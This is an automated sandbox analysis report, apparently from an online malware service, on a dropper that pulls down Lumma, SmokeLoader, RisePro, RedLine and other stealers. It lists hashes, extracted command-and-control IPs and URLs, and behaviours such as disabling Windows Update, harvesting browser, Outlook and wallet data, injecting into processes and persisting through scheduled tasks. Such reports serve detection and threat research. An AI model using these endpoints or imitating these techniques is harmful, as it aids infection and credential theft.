Resubmissions
11-02-2024 08:10
240211-j212ragb47 1011-02-2024 08:09
240211-j2kprseb2w 1009-02-2024 18:28
240209-w4c4xsde9t 1002-02-2024 12:52
240202-p4dxwsgfej 1002-02-2024 12:45
240202-pzapnsgdbp 1016-01-2024 15:29
240116-sw8dbaehh3 1010-01-2024 14:41
240110-r2wq2ahchl 1010-01-2024 13:29
240110-qrqatshbg3 1022-12-2023 08:48
231222-kqp1sadghq 10Analysis
-
max time kernel
104s -
max time network
102s -
platform
windows10-1703_x64 -
resource
win10-20231220-en -
resource tags
arch:x64arch:x86image:win10-20231220-enlocale:en-usos:windows10-1703-x64system -
submitted
09-02-2024 18:28
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10-20231220-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral4
Sample
4363463463464363463463463.exe
Resource
win11-20231222-en
Errors
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
lumma
185.99.133.246
Extracted
smokeloader
pub2
Extracted
smokeloader
2022
http://vatra.at/tmp/
http://spbdg.ru/tmp/
http://skinndia.com/tmp/
http://cracker.biz/tmp/
http://piratia-life.ru/tmp/
http://piratia.su/tmp/
Extracted
risepro
193.233.132.62
Extracted
redline
vic
91.92.241.115:12393
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Lumma Stealer payload V2 1 IoCs
resource yara_rule behavioral2/files/0x000600000001abad-53.dat family_lumma_V2 -
Detect Lumma Stealer payload V4 1 IoCs
resource yara_rule behavioral2/files/0x000600000001abad-53.dat family_lumma_v4 -
Detect ZGRat V1 6 IoCs
resource yara_rule behavioral2/files/0x000700000001ab7a-132.dat family_zgrat_v1 behavioral2/files/0x000700000001ab7a-133.dat family_zgrat_v1 behavioral2/memory/3828-136-0x0000000000A40000-0x0000000000F44000-memory.dmp family_zgrat_v1 behavioral2/files/0x000700000001ab8f-145.dat family_zgrat_v1 behavioral2/files/0x000700000001ab8f-222.dat family_zgrat_v1 behavioral2/files/0x000700000001ab8f-223.dat family_zgrat_v1 -
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral2/memory/1056-386-0x0000000000400000-0x000000000043C000-memory.dmp family_redline behavioral2/memory/1056-468-0x0000000000400000-0x000000000043C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 676 created 708 676 WerFault.exe 143 -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 2944 created 588 2944 powershell.EXE 3 PID 2772 created 588 2772 powershell.EXE 3 PID 1296 created 996 1296 svchost.exe 67 PID 1296 created 708 1296 svchost.exe 143 -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\Control Panel\International\Geo\Nation Setup.exe -
Executes dropped EXE 15 IoCs
pid Process 2660 jopacrypt.exe 3552 InstallSetup9.exe 2940 BroomSetup.exe 4372 nsd829F.tmp 1676 crypted.exe 2804 dmi1dfg7n.exe 2740 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe 5080 plaza.exe 3896 v2.exe 2816 Setup.exe 3828 ma.exe 2000 .exe 3544 updater.exe 2192 asdfg.exe 1200 smss.exe -
Loads dropped DLL 3 IoCs
pid Process 3552 InstallSetup9.exe 3552 InstallSetup9.exe 3896 v2.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Setup.exe Key opened \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Setup.exe Key opened \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Setup.exe Key opened \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Setup.exe Key opened \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Setup.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 13 bitbucket.org 14 bitbucket.org 32 raw.githubusercontent.com 33 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 41 api.ipify.org 42 api.ipify.org -
Drops file in System32 directory 8 IoCs
description ioc Process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt Process not Found File opened for modification C:\Windows\System32\CatRoot2\dberr.txt Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Process not Found File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 1676 crypted.exe 5080 plaza.exe 5080 plaza.exe 5080 plaza.exe 5080 plaza.exe 5080 Process not Found 5080 Process not Found -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 2660 set thread context of 5028 2660 jopacrypt.exe 78 PID 2804 set thread context of 4308 2804 dmi1dfg7n.exe 125 PID 2944 set thread context of 928 2944 powershell.EXE 132 PID 3896 set thread context of 1056 3896 v2.exe 133 PID 2772 set thread context of 3092 2772 powershell.EXE 134 PID 2000 set thread context of 1664 2000 .exe 138 PID 3544 set thread context of 4052 3544 Process not Found 1793 PID 3544 set thread context of 4352 3544 Process not Found 1936 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe dmi1dfg7n.exe File created C:\Program Files\Google\Libs\WR64.sys Process not Found File created C:\Program Files\Google\Libs\g.log smss.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\dialersvc32.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc32.job dialer.exe File created C:\Windows\Tasks\dialersvc64.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc64.job dialer.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4552 sc.exe 3696 sc.exe 2848 sc.exe 1060 sc.exe 4224 sc.exe 1720 sc.exe 4152 sc.exe 4812 sc.exe 4876 sc.exe 808 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 11 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 svchost.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4740 schtasks.exe 1048 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3544 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4220 WMIC.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f 4363463463464363463463463.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2240 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2740 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe 2740 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 2816 Setup.exe 2816 Setup.exe 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 4212 powershell.exe 4212 powershell.exe 3380 Explorer.EXE 3380 Explorer.EXE 4212 powershell.exe 3380 Explorer.EXE 3380 Explorer.EXE 4212 powershell.exe 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE 3380 Explorer.EXE -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 1224 Process not Found 1060 Process not Found 4104 Process not Found 2184 Process not Found 796 Process not Found 3652 Process not Found 808 Process not Found 3132 Process not Found 4880 Process not Found 732 Process not Found 1768 Process not Found 4768 Process not Found 4788 Process not Found 5104 Process not Found 1748 Process not Found 3192 Process not Found 3160 Process not Found 3356 Process not Found 4304 Process not Found 3628 Process not Found 4924 Process not Found 3116 Process not Found 1004 Process not Found 664 Process not Found 2944 Process not Found 2320 Process not Found 2312 Process not Found 3136 Process not Found 4828 Process not Found 2852 Process not Found 1692 Process not Found 680 Process not Found 4256 Process not Found 4904 Process not Found 704 Process not Found 1324 Process not Found 3492 Process not Found 4544 smss.exe 3704 Process not Found 4564 Process not Found 3692 Process not Found 620 Process not Found 4136 Process not Found 2672 Process not Found 1576 Process not Found 4292 Process not Found 2056 Process not Found 3760 smss.exe 2364 Process not Found 3328 Process not Found 320 Process not Found 656 Process not Found 608 Process not Found 4876 Process not Found 2888 Process not Found 2148 Process not Found 2816 Process not Found 3236 Process not Found 4972 Process not Found 5036 Process not Found 3256 Process not Found 3296 Process not Found 3516 Process not Found 1048 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2740 75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4888 4363463463464363463463463.exe Token: SeLoadDriverPrivilege 1676 crypted.exe Token: SeDebugPrivilege 3828 ma.exe Token: SeDebugPrivilege 4212 powershell.exe Token: SeIncreaseQuotaPrivilege 4212 powershell.exe Token: SeSecurityPrivilege 4212 powershell.exe Token: SeTakeOwnershipPrivilege 4212 powershell.exe Token: SeLoadDriverPrivilege 4212 powershell.exe Token: SeSystemProfilePrivilege 4212 powershell.exe Token: SeSystemtimePrivilege 4212 powershell.exe Token: SeProfSingleProcessPrivilege 4212 powershell.exe Token: SeIncBasePriorityPrivilege 4212 powershell.exe Token: SeCreatePagefilePrivilege 4212 powershell.exe Token: SeBackupPrivilege 4212 powershell.exe Token: SeRestorePrivilege 4212 powershell.exe Token: SeShutdownPrivilege 4212 powershell.exe Token: SeDebugPrivilege 4212 powershell.exe Token: SeSystemEnvironmentPrivilege 4212 powershell.exe Token: SeRemoteShutdownPrivilege 4212 powershell.exe Token: SeUndockPrivilege 4212 powershell.exe Token: SeManageVolumePrivilege 4212 powershell.exe Token: 33 4212 powershell.exe Token: 34 4212 powershell.exe Token: 35 4212 powershell.exe Token: 36 4212 powershell.exe Token: SeShutdownPrivilege 1140 powercfg.exe Token: SeCreatePagefilePrivilege 1140 powercfg.exe Token: SeShutdownPrivilege 1268 powercfg.exe Token: SeCreatePagefilePrivilege 1268 powercfg.exe Token: SeShutdownPrivilege 1580 powercfg.exe Token: SeCreatePagefilePrivilege 1580 powercfg.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeShutdownPrivilege 1288 powercfg.exe Token: SeCreatePagefilePrivilege 1288 powercfg.exe Token: SeDebugPrivilege 2000 .exe Token: SeIncreaseQuotaPrivilege 4172 powershell.exe Token: SeSecurityPrivilege 4172 powershell.exe Token: SeTakeOwnershipPrivilege 4172 powershell.exe Token: SeLoadDriverPrivilege 4172 powershell.exe Token: SeSystemProfilePrivilege 4172 powershell.exe Token: SeSystemtimePrivilege 4172 powershell.exe Token: SeProfSingleProcessPrivilege 4172 powershell.exe Token: SeIncBasePriorityPrivilege 4172 powershell.exe Token: SeCreatePagefilePrivilege 4172 powershell.exe Token: SeBackupPrivilege 4172 powershell.exe Token: SeRestorePrivilege 4172 powershell.exe Token: SeShutdownPrivilege 4172 powershell.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeSystemEnvironmentPrivilege 4172 powershell.exe Token: SeRemoteShutdownPrivilege 4172 powershell.exe Token: SeUndockPrivilege 4172 powershell.exe Token: SeManageVolumePrivilege 4172 powershell.exe Token: 33 4172 powershell.exe Token: 34 4172 powershell.exe Token: 35 4172 powershell.exe Token: 36 4172 powershell.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeIncreaseQuotaPrivilege 4172 powershell.exe Token: SeSecurityPrivilege 4172 powershell.exe Token: SeTakeOwnershipPrivilege 4172 powershell.exe Token: SeLoadDriverPrivilege 4172 powershell.exe Token: SeSystemProfilePrivilege 4172 powershell.exe Token: SeSystemtimePrivilege 4172 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1664 vbc.exe 996 dwm.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2940 BroomSetup.exe 5080 plaza.exe -
Suspicious use of WriteProcessMemory 64 IoCs
